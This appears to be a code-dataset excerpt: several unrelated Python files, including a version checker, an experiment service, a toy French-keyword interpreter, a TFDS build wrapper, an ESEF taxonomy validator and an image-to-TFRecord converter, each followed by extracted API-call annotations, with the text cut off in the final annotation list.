latest = get_latest_version()
supported = semantic_version.Version(str(latest.major), partial=True)
requested = semantic_version.Version.coerce(str(version))
if supported.major != requested.major:
msg = 'Unsupported Dynamic UI format version: ' \
'requested format version {0} is not compatible with the ' \
'supported family {1}'
raise ValueError(msg.format(requested, supported))
if requested > latest:
msg = 'Unsupported Dynamic UI format version: ' \
'requested format version {0} is newer than ' \
'latest supported {1}'
raise ValueError(msg.format(requested, latest))
def get_latest_version():
return semantic_version.Version.coerce(LATEST_FORMAT_VERSION)
|
[
"semantic_version.Version.coerce"
] |
[((1420, 1474), 'semantic_version.Version.coerce', 'semantic_version.Version.coerce', (['LATEST_FORMAT_VERSION'], {}), '(LATEST_FORMAT_VERSION)\n', (1451, 1474), False, 'import semantic_version\n')]
|
from typing import List, Optional
from huoguoml.schema.experiment import Experiment
from huoguoml.server.entity.experiment import ExperimentORM
from huoguoml.server.entity.run import RunORM
from huoguoml.server.repository.experiment import ExperimentRepository
from huoguoml.server.service import Service
class ExperimentService(Service):
def __init__(self, artifact_dir: str):
super(ExperimentService, self).__init__(artifact_dir=artifact_dir)
self.repository = ExperimentRepository(database_url=self.database_url,
connect_args=self.connect_args)
def get_experiments(self) -> List[ExperimentORM]:
return self.repository.get_experiments()
def get_experiment(self, experiment_name: str) -> Optional[ExperimentORM]:
return self.repository.get_experiment(experiment_name=experiment_name)
def get_experiment_run(self, experiment_name: str, experiment_run_nr: int) -> Optional[RunORM]:
return self.repository.get_experiment_run(experiment_name=experiment_name,
experiment_run_nr=experiment_run_nr)
def update_experiment(self, experiment_name: str, experiment: Experiment) -> Optional[ExperimentORM]:
experiment_orm = self.repository.update_experiment(experiment_name=experiment_name, experiment=experiment)
return experiment_orm
|
[
"huoguoml.server.repository.experiment.ExperimentRepository"
] |
[((488, 577), 'huoguoml.server.repository.experiment.ExperimentRepository', 'ExperimentRepository', ([], {'database_url': 'self.database_url', 'connect_args': 'self.connect_args'}), '(database_url=self.database_url, connect_args=self.\n connect_args)\n', (508, 577), False, 'from huoguoml.server.repository.experiment import ExperimentRepository\n')]
|
import sys
import os.path
import time
import re
print("STALINIUM V1 PAR ALEXDIEU")
if len(sys.argv) > 1:
file = sys.argv[1]
if os.path.isfile(file):
pass
else:
print("Error , File doesn't exist !")
else:
file = input(">>>")
variables = {}
lignes = []
try:
with open(file, "r") as f:
for index, value in enumerate(f.readlines()):
lignes.append(value.strip("\n"))
lignes = [i for i in lignes if i]
except:
lignes.append(file)
def lts(a):
lt = ""
return ' '.join(a)
def CHEZCFIRST(mot, ligne):
exitp = False
sec = ''
prem = ''
try:
prem = ligne.partition(mot)[0]
exitp = True
except:
return True
if exitp == True:
if prem.isspace() == True:
return True
elif prem == '' or prem == None:
return True
else:
return False
def calc(ligne: list) -> float:
tried2 = True
try:
if ligne[2] == "+":
return float(ligne[1]) + float(ligne[3])
if ligne[2] == "-":
return float(ligne[1]) - float(ligne[3])
if ligne[2] == "*":
return float(ligne[1]) * float(ligne[3])
if ligne[2] == "/":
return float(ligne[1]) / float(ligne[3])
if ligne[2] == "**":
return float(ligne[1]) ** float(ligne[3])
if ligne[2] == "//":
return float(ligne[1]) % float(ligne[3])
else:
check_if(ligne.split())
except:
try:
if "+" in ligne[1]:
prems = ligne[1].partition("+")[0]
sec = ligne[1].partition("+")[2]
ope = "+"
return("ERREUR 1 , les nombres doivent êtrent espacés de l\'opérateur comme ça : " + prems + " " + ope + " " + sec)
elif "-" in ligne[1]:
prems = ligne[1].partition("-")[0]
sec = ligne[1].partition("-")[2]
ope = "+"
return("ERREUR 1 , les nombres doivent êtrent espacés de l\'opérateur comme ça : " + prems + " " + ope + " " + sec)
elif "*" in ligne[1]:
prems = ligne[1].partition("*")[0]
sec = ligne[1].partition("*")[2]
ope = "*"
return("ERREUR 1 , les nombres doivent êtrent espacés de l\'opérateur comme ça : " + prems + " " + ope + " " + sec)
elif "/" in ligne[1]:
prems = ligne[1].partition("/")[0]
sec = ligne[1].partition("/")[2]
ope = "/"
return("ERREUR 1 , les nombres doivent êtrent espacés de l\'opérateur comme ça : " + prems + " " + ope + " " + sec)
elif "**" in ligne[1]:
prems = ligne[1].partition("**")[0]
sec = ligne[1].partition("**")[2]
ope = "**"
return("ERREUR 1 , les nombres doivent êtrent espacés de l\'opérateur comme ça : " + prems + " " + ope + " " + sec)
elif "//" in ligne[1]:
prems = ligne[1].partition("//")[0]
sec = ligne[1].partition("//")[2]
ope = "**"
return("ERREUR 1 , les nombres doivent êtrent espacés de l\'opérateur comme ça : " + prems + " " + ope + " " + sec)
else:
if tried2 == True:
return("ERREUR 2 , Opérateur inconnu ! : " + lignes[0])
else:
check_if(ligne.split())
except:
return "ERREUR 7 : AUCUN CALCUL DONNE"
def check_if(ligne: list) -> float:
args = []
tried2 = True
try:
for arg in ligne[1:]:
args.append(arg)
if args[1] == "?=":
if args[0] == args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == "<":
if args[0] < args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == ">":
if args[0] > args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == "<=":
if args[0] <= args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == "!=":
if args[0] != args[2]:
return "Vrai"
else:
return "Faux"
elif args[1] == ">=":
if args[0] >= args[2]:
return "Vrai"
else:
return "Faux"
else:
if tried2 == True:
return("ERREUR 2 , Opérateur inconnu ! : " + arg[0])
else:
calc(ligne.split())
except:
return "ERREUR 7 AUCUNE CONDITION DONNE"
def scan(lignes: list):
for ligne in lignes:
sortie = []
check = ''
bon = False
ans = False
split_ligne = ligne.split()
if "montre" in ligne:
ans = False
ans = CHEZCFIRST("montre", ligne)
if ans == True:
lit = " ".join(split_ligne[1:])
if ":" in lit:
check = lit.partition(":")[0]
check = check[-1:]
if check == "\\":
pass
else:
erreurs = 0
erreur = []
erN = []
ni = False
name = lit.partition(":")[2]
name = name.split()
NAME = ''
NAMEV = ''
ende = len(name)
for i in range(0, ende):
NAME = NAME + '-' + name[i]
if i == 0:
NAMEV = NAMEV + ':' + name[i]
else:
NAMEV = NAMEV + ' ' + name[i]
if NAME in variables:
erreurs = erreurs + 1
erreur.append(NAME)
erN.append(NAMEV)
else:
pass
if len(erreur) == 0:
ni = True
print("ERREUR 6 : VARIABLE N'EXISTE PAS")
if len(erreur) == 1:
ni = True
val = variables[erreur[0]]
lit = lit.replace(NAMEV, val, 1)
if len(erreur) == 2:
ni = True
print("ATTENTION : DEUX VARIABLES ONT UN NOM SIMILIAIRE AU DEBUT : "+ erN[0] +" et "+ erN[1] +" ! STALINIUM prends la première par défault ! ")
val = variables[erreur[0]]
lit = lit.replace(NAMEV, val, 1)
else:
if ni == False:
print("ATTENTION : PLUSIEURS VARIABLES ONT UN NOM SIMILIAIRE AU DEBUT ! STALINIUM prends la première par défault ! ")
val = variables[erreur[0]]
lit = lit.replace(NAMEV, val, 1)
else:
pass
if "\\:" in lit:
lit = lit.replace("\\:", ":")
else:
pass
print(lit)
bon = True
else:
pass
if "calcul" in ligne:
ans = False
ans = CHEZCFIRST("calcul", ligne)
if ans == True:
print(calc(split_ligne))
bon = True
else:
pass
if "si" in ligne:
ans = False
ans = CHEZCFIRST("si", ligne)
if ans == True:
print(check_if(split_ligne))
bon = True
else:
pass
if "sortir" in ligne:
ans = False
exitp = False
sec = ''
prem = ''
try:
prem = ligne.partition("sortir")[0]
sec = ligne.partition("sortir")[2]
exitp = True
except:
exit()
if exitp == True:
if sec.isspace() == True and prem.isspace() == True:
exit()
elif sec == '' or sec == None and prem == '' or prem == None:
exit()
else:
pass
if 'dors' in ligne:
listDORS = []
ans = False
ans = CHEZCFIRST("dors", ligne)
if ans == True:
try:
bon = int(" ".join(split_ligne[1]))
except:
print("ERREUR 3 : Mauvaise SYNTAXE pour DORS : DORS + TEMPS // exemple : dors 2")
try:
listDORS = split_ligne
listDORS.remove(str(bon))
listDORS.remove("dors")
arg = lts(listDORS)
except:
print("DORS ARG : IMPOSSIBLE DE CONVERTIR EN LITTERAIRE ")
arg = ''
if arg != '':
print(arg)
else:
pass
time.sleep(bon)
bon = True
else:
pass
if "pause" in ligne:
ans = False
ans = CHEZCFIRST("pause", ligne)
if ans == True:
pause = False
sec = ''
prem = ''
try:
prem = ligne.partition("pause")[0]
sec = ligne.partition("pause")[2]
pause = True
except:
input("Pause ...")
if pause == True:
sec = sec[1:]
if prem.isspace() == True:
input(sec + "...")
elif prem == '' or prem == None:
input(sec + "...")
else:
pass
bon = True
if ":" in ligne:
NAME = ''
verif = ligne.partition(":")[0]
if verif == '' or verif.isspace() == True:
try:
verif2 = ligne.partition("=")[2]
if verif2 == '' or verif2.isspace() == True:
try:
namevar = ligne.partition(":")[2]
namevar = namevar.split()
ende = len(namevar)
for i in range(0, ende):
NAME = NAME + '-' + namevar[i]
try:
print(variables[NAME])
except:
print("ERREUR 6 VARIABLE N'EXISTE PAS")
except:
print("ERREUR 6 VARIABLE NON DEFINIE !")
else:
namevar = ligne.partition(":")[2]
namevar = namevar.split()
ende = len(namevar)
stop = 100000
NAME = ''
STOCK = ''
if namevar[0] == '=':
print("ERREUR 6 NOM DE VARIABLE NON DEFINIE")
else:
for i in range(0, ende):
if namevar[i] == '=':
stop = i
elif stop < i:
pass
else:
NAME = NAME + '-' + namevar[i]
for i in range(0, ende):
if i <= stop:
pass
elif stop + 1 == i:
STOCK = STOCK + namevar[i]
else:
STOCK = STOCK + ' ' + namevar[i]
try:
variables[NAME] = STOCK
except:
print("ERREUR ?? : erreur inconnue")
except:
print("ERREUR 6 VARIABLE N'A PAS DE DEFINITION")
else:
pass
else:
if "if" in ligne:
if bon == True:
pass
else:
v = ligne.partition("if")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour si :"," si " + v)
bon = True
if "print" in ligne:
if bon == True:
pass
else:
v = ligne.partition("print")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour montrer :"," montre " + v)
bon = True
if "output" in ligne:
if bon == True:
pass
else:
v = ligne.partition("output")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour montrer :"," montre " + v)
bon = True
if "operat" in ligne:
if bon == True:
pass
else:
v = ligne.partition(" ")[2]
print("ERREUR 3 : On est pas en Angleterre ici ! Pour calcul :"," calcul " + v)
bon = True
if "exit" in ligne:
if bon == True:
pass
else:
print("ERREUR 3 : On est pas en Angleterre ici ! Pour sortir :"," sortir")
bon = True
if "calcul" in ligne:
bon = True
pass
else:
if bon == True:
pass
else:
print("Uh , je n'arrive pas a déterminer ce que fait cette commande : " + ligne)
if ".cccp" in file:
lignes = []
if os.path.isfile(file):
with open(file, "r") as f:
for index, value in enumerate(f.readlines()):
lignes.append(value.strip("\n"))
lignes = [i for i in lignes if i]
scan(lignes)
else:
lignes.append(file)
scan(lignes)
else:
lignes = []
lignes.append(file)
scan(lignes)
lignes = []
while True:
file = input(">>>")
lignes = []
if ".cccp" in file:
lignes = []
if os.path.isfile(file):
with open(file, "r") as f:
for index, value in enumerate(f.readlines()):
lignes.append(value.strip("\n"))
lignes = [i for i in lignes if i]
scan(lignes)
else:
lignes.append(file)
scan(lignes)
else:
lignes.append(file)
scan(lignes)
|
[
"time.sleep"
] |
[((9553, 9568), 'time.sleep', 'time.sleep', (['bon'], {}), '(bon)\n', (9563, 9568), False, 'import time\n')]
|
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Wrapper around `tfds build`."""
import argparse
from typing import List
from absl import app
from absl import flags
from absl import logging
from tensorflow_datasets.scripts.cli import main as main_cli
module_import = flags.DEFINE_string(
'module_import', None, '`--imports` flag'
)
builder_config_id = flags.DEFINE_integer(
'builder_config_id', None, '`--config_idx` flag'
)
def _parse_flags(argv: List[str]) -> argparse.Namespace:
"""Command lines flag parsing."""
return main_cli._parse_flags([argv[0], 'build'] + argv[1:]) # pylint: disable=protected-access
_display_warning = True
def main(args: argparse.Namespace) -> None:
if _display_warning:
logging.warning(
'***`tfds build` should be used instead of `download_and_prepare`.***'
)
if module_import.value:
args.imports = module_import.value
if builder_config_id.value is not None:
args.config_idx = builder_config_id.value
main_cli.main(args)
if __name__ == '__main__':
app.run(main, flags_parser=_parse_flags)
|
[
"tensorflow_datasets.scripts.cli.main._parse_flags",
"absl.logging.warning",
"absl.flags.DEFINE_string",
"absl.app.run",
"absl.flags.DEFINE_integer",
"tensorflow_datasets.scripts.cli.main.main"
] |
[((838, 900), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""module_import"""', 'None', '"""`--imports` flag"""'], {}), "('module_import', None, '`--imports` flag')\n", (857, 900), False, 'from absl import flags\n'), ((927, 997), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""builder_config_id"""', 'None', '"""`--config_idx` flag"""'], {}), "('builder_config_id', None, '`--config_idx` flag')\n", (947, 997), False, 'from absl import flags\n'), ((1108, 1160), 'tensorflow_datasets.scripts.cli.main._parse_flags', 'main_cli._parse_flags', (["([argv[0], 'build'] + argv[1:])"], {}), "([argv[0], 'build'] + argv[1:])\n", (1129, 1160), True, 'from tensorflow_datasets.scripts.cli import main as main_cli\n'), ((1553, 1572), 'tensorflow_datasets.scripts.cli.main.main', 'main_cli.main', (['args'], {}), '(args)\n', (1566, 1572), True, 'from tensorflow_datasets.scripts.cli import main as main_cli\n'), ((1604, 1644), 'absl.app.run', 'app.run', (['main'], {'flags_parser': '_parse_flags'}), '(main, flags_parser=_parse_flags)\n', (1611, 1644), False, 'from absl import app\n'), ((1296, 1388), 'absl.logging.warning', 'logging.warning', (['"""***`tfds build` should be used instead of `download_and_prepare`.***"""'], {}), "(\n '***`tfds build` should be used instead of `download_and_prepare`.***')\n", (1311, 1388), False, 'from absl import logging\n')]
|
from operator import mul
try:
reduce
except NameError:
from functools import reduce
import numpy as np
def logit(x):
return np.log(x) - np.log(1 - x)
def logitsum(xs):
total = 0
for x in xs:
total += logit(x)
return total
def prod(*x):
return reduce(mul, x, 1)
|
[
"functools.reduce",
"numpy.log"
] |
[((286, 303), 'functools.reduce', 'reduce', (['mul', 'x', '(1)'], {}), '(mul, x, 1)\n', (292, 303), False, 'from functools import reduce\n'), ((139, 148), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (145, 148), True, 'import numpy as np\n'), ((151, 164), 'numpy.log', 'np.log', (['(1 - x)'], {}), '(1 - x)\n', (157, 164), True, 'import numpy as np\n')]
|
'''
Created on June 6, 2018
Filer Guidelines: esma32-60-254_esef_reporting_manual.pdf
Taxonomy Architecture:
Taxonomy package expected to be installed:
@author: Mark V Systems Limited
(c) Copyright 2018 Mark V Systems Limited, All rights reserved.
'''
import re
from arelle import ModelDocument, XbrlConst
from arelle.ModelDtsObject import ModelConcept
from arelle.ModelObject import ModelObject
from .Const import qnDomainItemType, standardTaxonomyURIs
def checkFilingDTS(val, modelDocument, visited):
visited.append(modelDocument)
for referencedDocument, modelDocumentReference in modelDocument.referencesDocument.items():
if referencedDocument not in visited and referencedDocument.inDTS: # ignore non-DTS documents
checkFilingDTS(val, referencedDocument, visited)
if (modelDocument.type == ModelDocument.Type.SCHEMA and
(modelDocument.uri.startswith(val.modelXbrl.uriDir) or
not any(modelDocument.uri.startswith(standardTaxonomyURI) for standardTaxonomyURI in standardTaxonomyURIs))):
val.hasExtensionSchema = True
tuplesInExtTxmy = []
typedDimsInExtTxmy = []
domainMembersWrongType = []
extLineItemsWithoutHypercube = []
extAbstractConcepts = []
if modelDocument.targetNamespace is not None:
for modelConcept in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.w3.org/2001/XMLSchema}element"):
if isinstance(modelConcept,ModelConcept):
name = modelConcept.get("name")
if name is None:
name = ""
if modelConcept.get("ref") is not None:
continue # don't validate ref's here
if modelConcept.isTuple:
tuplesInExtTxmy.append(modelConcept)
if modelConcept.isTypedDimension:
typedDimsInExtTxmy.append(modelConcept)
if modelConcept.isDomainMember and modelConcept in val.domainMembers and modelConcept.typeQname != qnDomainItemType:
domainMembersWrongType.append(modelConcept)
if modelConcept.isPrimaryItem and not modelConcept.isAbstract and modelConcept not in val.primaryItems:
extLineItemsWithoutHypercube.append(modelConcept)
if modelConcept.isAbstract and modelConcept not in val.domainMembers:
extAbstractConcepts.append(modelConcept)
# what is language of standard label?
label = modelConcept.label(lang="en", fallbackToQname=False)
if label:
# allow Joe's Bar, N.A. to be JoesBarNA -- remove ', allow A. as not article "a"
lc3name = ''.join(re.sub(r"['.-]", "", (w[0] or w[2] or w[3] or w[4])).title()
for w in re.findall(r"((\w+')+\w+)|(A[.-])|([.-]A(?=\W|$))|(\w+)", label)
# if w[4].lower() not in ("the", "a", "an")
)
if not(name == lc3name or
(name and lc3name and lc3name[0].isdigit() and name[1:] == lc3name and (name[0].isalpha() or name[0] == '_'))):
val.modelXbrl.warning("esma.3.2.1.extensionTaxonomyElementNameDoesNotFollowLc3Convention",
_("Extension taxonomy element name SHOULD follow the LC3 convention: %(concept)s should match expected LC3 composition %(lc3name)s"),
modelObject=modelConcept, concept=modelConcept.qname, lc3name=lc3name)
if tuplesInExtTxmy:
val.modelXbrl.error("esma.2.1.3.tupleDefinedInExtensionTaxonomy",
_("Tuples MUST NOT be defined in extension taxonomy: %(concepts)s"),
modelObject=tuplesInExtTxmy, concepts=", ".join(str(c.qname) for c in tuplesInExtTxmy))
if typedDimsInExtTxmy:
val.modelXbrl.warning("esma.3.2.3.typedDimensionDefinitionInExtensionTaxonomy",
_("Extension taxonomy SHOULD NOT define typed dimensions: %(concepts)s."),
modelObject=typedDimsInExtTxmy, concepts=", ".join(str(c.qname) for c in typedDimsInExtTxmy))
if domainMembersWrongType:
val.modelXbrl.error("esma.3.2.2.domainMemberWrongDataType",
_("Domain members MUST have domainItemType data type as defined in \"http://www.xbrl.org/dtr/type/nonNumeric-2009-12-16.xsd\": concept %(concepts)s."),
modelObject=domainMembersWrongType, concepts=", ".join(str(c.qname) for c in domainMembersWrongType))
if extLineItemsWithoutHypercube:
val.modelXbrl.error("esma.3.4.1.extensionTaxonomyLineItemNotLinkedToAnyHypercube",
_("Line items that do not require any dimensional information to tag data MUST be linked to \"Line items not dimensionally qualified\" hypercube in http://www.esma.europa.eu/xbrl/esef/role/esef_role-999999 declared in esef_cor.xsd: concept %(concepts)s."),
modelObject=extLineItemsWithoutHypercube, concepts=", ".join(str(c.qname) for c in extLineItemsWithoutHypercube))
if extAbstractConcepts:
val.modelXbrl.warning("esma.3.2.5.abstractConceptDefinitionInExtensionTaxonomy",
_("Extension taxonomy SHOULD NOT define abstract concepts: concept %(concepts)s."),
modelObject=extAbstractConcepts, concepts=", ".join(str(c.qname) for c in extAbstractConcepts))
embeddedLinkbaseElements = [e
for e in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.xbrl.org/2003/linkbase}linkbase")
if isinstance(e,ModelObject)]
if embeddedLinkbaseElements:
val.modelXbrl.error("esma.3.1.1.linkbasesNotSeparateFiles",
_("Each linkbase type SHOULD be provided in a separate linkbase file, but a linkbase was found in %(schema)s."),
modelObject=embeddedLinkbaseElements, schema=modelDocument.basename)
if (modelDocument.type == ModelDocument.Type.LINKBASE and
(modelDocument.uri.startswith(val.modelXbrl.uriDir) or
not any(modelDocument.uri.startswith(standardTaxonomyURI) for standardTaxonomyURI in standardTaxonomyURIs))):
linkbasesFound = set()
for linkEltName in ("labelLink", "presentationLink", "calculationLink", "definitionLink"):
for linkElt in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.xbrl.org/2003/linkbase}" + linkEltName):
if linkEltName == "labelLink":
val.hasExtensionLbl = True
linkbasesFound.add(linkEltName)
if linkEltName == "presentationLink":
val.hasExtensionPre = True
linkbasesFound.add(linkEltName)
if linkEltName == "calculationLink":
val.hasExtensionCal = True
linkbasesFound.add(linkEltName)
if linkEltName == "definitionLink":
val.hasExtensionDef = True
linkbasesFound.add(linkEltName)
if len(linkbasesFound) > 1:
val.modelXbrl.error("esma.3.1.1.extensionTaxonomyWrongFilesStructure",
_("Each linkbase type SHOULD be provided in a separate linkbase file, found: %(linkbasesFound)s."),
modelObject=modelDocument.xmlRootElement, linkbasesFound=", ".join(sorted(linkbasesFound)))
# check for any prohibiting dimensionArc's
for prohibitingArcElt in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.xbrl.org/2003/linkbase}definitionArc"):
if (prohibitingArcElt.get("use") == "prohibited" and
prohibitingArcElt.get("{http://www.w3.org/1999/xlink}arcrole") == XbrlConst.dimensionDefault):
val.modelXbrl.error("esma.3.4.3.extensionTaxonomyOverridesDefaultMembers",
_("The extension taxonomy MUST not modify (prohibit and/or override) default members assigned to dimensions by the ESEF taxonomy."),
modelObject=modelDocument.xmlRootElement, linkbasesFound=", ".join(sorted(linkbasesFound)))
|
[
"re.findall",
"re.sub"
] |
[((2994, 3061), 're.findall', 're.findall', (['"""((\\\\w+\')+\\\\w+)|(A[.-])|([.-]A(?=\\\\W|$))|(\\\\w+)"""', 'label'], {}), '("((\\\\w+\')+\\\\w+)|(A[.-])|([.-]A(?=\\\\W|$))|(\\\\w+)", label)\n', (3004, 3061), False, 'import re\n'), ((2882, 2931), 're.sub', 're.sub', (['"""[\'.-]"""', '""""""', '(w[0] or w[2] or w[3] or w[4])'], {}), '("[\'.-]", \'\', w[0] or w[2] or w[3] or w[4])\n', (2888, 2931), False, 'import re\n')]
|
import argparse
import os
from multiprocessing import Process
import tensorflow as tf
from tqdm import tqdm
class Converter:
'''
Converter class for scanning input directory for classes and automatic conversion to TFRecords.
The resultant TFRecord stores the height, width, channels, associated label (inferred from directory) and the raw image in binary format
'''
@staticmethod
def _bytes_feature(value):
if isinstance(value, type(tf.constant(0))):
value = value.numpy()
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
@staticmethod
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _image_example(self, path, label, _resize=None, maintain_aspect_ratio=False, _grayscale=False):
image = tf.io.read_file(path)
loaded_image = tf.image.decode_image(image, channels=3)
if _resize is not None:
loaded_image = tf.image.resize(loaded_image, _resize, preserve_aspect_ratio=maintain_aspect_ratio)
if _grayscale:
loaded_image = tf.image.rgb_to_grayscale(loaded_image)
image_shape = loaded_image.shape
feature = {
'height': self._int64_feature(image_shape[0]),
'width': self._int64_feature(image_shape[1]),
'channels': self._int64_feature(image_shape[2]),
'label': self._bytes_feature(label) if isinstance(label.numpy(), bytes) else self._int64_feature(label),
'image_raw': self._bytes_feature(tf.io.encode_jpeg(tf.cast(loaded_image, tf.uint8))),
}
return tf.train.Example(features=tf.train.Features(feature=feature)).SerializeToString()
@staticmethod
def _get_paths(directory):
sub_dirs = tf.io.gfile.glob(f'{directory}/*')
class_names = [os.path.basename(i) for i in sub_dirs]
image_list, label_list = [], []
for class_num, i in enumerate(sub_dirs):
images = tf.io.gfile.glob(f'{i}/*')
labels = [class_names[class_num]] * (len(images)) if class_names else [class_num] * (len(images))
image_list.extend(images)
label_list.extend(labels)
return tf.constant(image_list), tf.constant(label_list)
def _writer(self, index, file_name, num_images_per_file, images, labels, *args):
with tf.io.TFRecordWriter(file_name) as writer:
index_start, index_stop = index * num_images_per_file, (index + 1) * num_images_per_file
# If another batch is possible then process normally otherwise process till the end of the list
if index_stop + num_images_per_file <= len(images):
for image_string, label in tqdm(
zip(images[index_start:index_stop], labels[index_start:index_stop])):
writer.write(self._image_example(image_string, label, *args))
else:
for image_string, label in tqdm(zip(images[index_start:], labels[index_start:])):
writer.write(self._image_example(image_string, label, *args))
def write_tfrecord(self, num_tfrecords, directory_path, out_dir, *args):
'''
This function requires a path to a directory with multiple
subdirectories having images arranged in classes.
The directories should be in the form of
External dir
|-- dir A
|-- img 1
|-- img 2
|-- dir B
|-- img 1
|-- img 2
file_names: List or iterable
directory_path: Path to External (outermost) directory
class_names: (Optional) List or tuple with names of classes.
Length should be equal to number of sub-directories
args: Arguments for augmentation
'''
file_names = [f"{out_dir}/{i}.tfrecord" if out_dir else f"{i}.tfrecord" for i in range(num_tfrecords)]
images, labels = self._get_paths(directory_path)
num_images_per_file = len(images) // len(file_names)
for index, file_name in enumerate(file_names):
self._writer(index, file_name, num_images_per_file, images, labels, *args)
print(f"Finished writing {len(images)} images")
def write_parallely(self, num_tfrecords, directory_path, out_dir, *args):
'''
This function requires a path to a directory with multiple
subdirectories having images arranged in classes.
The directories should be in the form of
External dir
|-- dir A
|-- img 1
|-- img 2
|-- dir B
|-- img 1
|-- img 2
file_names: List or iterable
directory_path: Path to External (outermost) directory
class_names: (Optional) List or tuple with names of classes.
Length should be equal to number of sub-directories
args: Arguments for augmentation
'''
file_names = [f"{out_dir}/{i}.tfrecord" if out_dir else f"{i}.tfrecord" for i in range(num_tfrecords)]
images, labels = self._get_paths(directory_path)
num_images_per_file = len(images) // len(file_names)
processes = [Process(target=self._writer,
args=(i, j, num_images_per_file, images, labels, *args)) for i, j
in
enumerate(file_names)]
for p in processes:
p.start()
for p in processes:
p.join()
print(f"Finished writing {len(images)} images")
if __name__ == '__main__':
def is_dir(string):
if os.path.isdir(string):
return string
else:
raise NotADirectoryError(string)
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--path', type=is_dir, required=True,
help="Path to directory containing image directories")
parser.add_argument('--num_tfrecords', type=int, help="Number of TFRecord files to be created", default=1)
parser.add_argument('--out_dir', type=is_dir, help="Path for directory where TFRecord files will be stored")
parser.add_argument('--run_parallely', dest='run_parallely', help="Use multi-processing for operations",
action='store_true')
parser.add_argument('--resize',
help='Resize list input in the form of `height, width`. Example: --resize 300,400', type=str)
parser.add_argument('--maintain_aspect_ratio', dest='maintain_aspect_ratio', help="Maintains aspect ratio",
action='store_true')
parser.add_argument('--grayscale', dest='grayscale', help="Maintains aspect ratio",
action='store_true')
arguments = parser.parse_args()
resize = tf.constant([int(item) for item in arguments.resize.split(',')], tf.int32)
converter = Converter()
if arguments.run_parallely:
converter.write_parallely(arguments.num_tfrecords, arguments.path, arguments.out_dir, resize,
arguments.maintain_aspect_ratio, arguments.grayscale)
else:
converter.write_tfrecord(arguments.num_tfrecords, arguments.path, arguments.out_dir, resize,
arguments.maintain_aspect_ratio, arguments.grayscale)
|
[
"tensorflow.train.BytesList",
"tensorflow.image.rgb_to_grayscale",
"argparse.ArgumentParser",
"tensorflow.train.Int64List",
"os.path.basename",
"os.path.isdir",
"tensorflow.io.TFRecordWriter",
"tensorflow.train.Features",
"tensorflow.constant",
"tensorflow.cast",
"tensorflow.image.decode_image",
"tensorflow.io.read_file",
"multiprocessing.Process",
"tensorflow.image.resize",
"tensorflow.io.gfile.glob"
] |
[((5766, 5791), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (5789, 5791), False, 'import argparse\n'), ((848, 869), 'tensorflow.io.read_file', 'tf.io.read_file', (['path'], {}), '(path)\n', (863, 869), True, 'import tensorflow as tf\n'), ((893, 933), 'tensorflow.image.decode_image', 'tf.image.decode_image', (['image'], {'channels': '(3)'}), '(image, channels=3)\n', (914, 933), True, 'import tensorflow as tf\n'), ((1799, 1833), 'tensorflow.io.gfile.glob', 'tf.io.gfile.glob', (['f"""{directory}/*"""'], {}), "(f'{directory}/*')\n", (1815, 1833), True, 'import tensorflow as tf\n'), ((5643, 5664), 'os.path.isdir', 'os.path.isdir', (['string'], {}), '(string)\n', (5656, 5664), False, 'import os\n'), ((993, 1081), 'tensorflow.image.resize', 'tf.image.resize', (['loaded_image', '_resize'], {'preserve_aspect_ratio': 'maintain_aspect_ratio'}), '(loaded_image, _resize, preserve_aspect_ratio=\n maintain_aspect_ratio)\n', (1008, 1081), True, 'import tensorflow as tf\n'), ((1127, 1166), 'tensorflow.image.rgb_to_grayscale', 'tf.image.rgb_to_grayscale', (['loaded_image'], {}), '(loaded_image)\n', (1152, 1166), True, 'import tensorflow as tf\n'), ((1857, 1876), 'os.path.basename', 'os.path.basename', (['i'], {}), '(i)\n', (1873, 1876), False, 'import os\n'), ((2007, 2033), 'tensorflow.io.gfile.glob', 'tf.io.gfile.glob', (['f"""{i}/*"""'], {}), "(f'{i}/*')\n", (2023, 2033), True, 'import tensorflow as tf\n'), ((2236, 2259), 'tensorflow.constant', 'tf.constant', (['image_list'], {}), '(image_list)\n', (2247, 2259), True, 'import tensorflow as tf\n'), ((2261, 2284), 'tensorflow.constant', 'tf.constant', (['label_list'], {}), '(label_list)\n', (2272, 2284), True, 'import tensorflow as tf\n'), ((2384, 2415), 'tensorflow.io.TFRecordWriter', 'tf.io.TFRecordWriter', (['file_name'], {}), '(file_name)\n', (2404, 2415), True, 'import tensorflow as tf\n'), ((5231, 5320), 'multiprocessing.Process', 'Process', ([], {'target': 'self._writer', 'args': '(i, j, num_images_per_file, images, labels, *args)'}), '(target=self._writer, args=(i, j, num_images_per_file, images,\n labels, *args))\n', (5238, 5320), False, 'from multiprocessing import Process\n'), ((469, 483), 'tensorflow.constant', 'tf.constant', (['(0)'], {}), '(0)\n', (480, 483), True, 'import tensorflow as tf\n'), ((564, 597), 'tensorflow.train.BytesList', 'tf.train.BytesList', ([], {'value': '[value]'}), '(value=[value])\n', (582, 597), True, 'import tensorflow as tf\n'), ((692, 725), 'tensorflow.train.Int64List', 'tf.train.Int64List', ([], {'value': '[value]'}), '(value=[value])\n', (710, 725), True, 'import tensorflow as tf\n'), ((1587, 1618), 'tensorflow.cast', 'tf.cast', 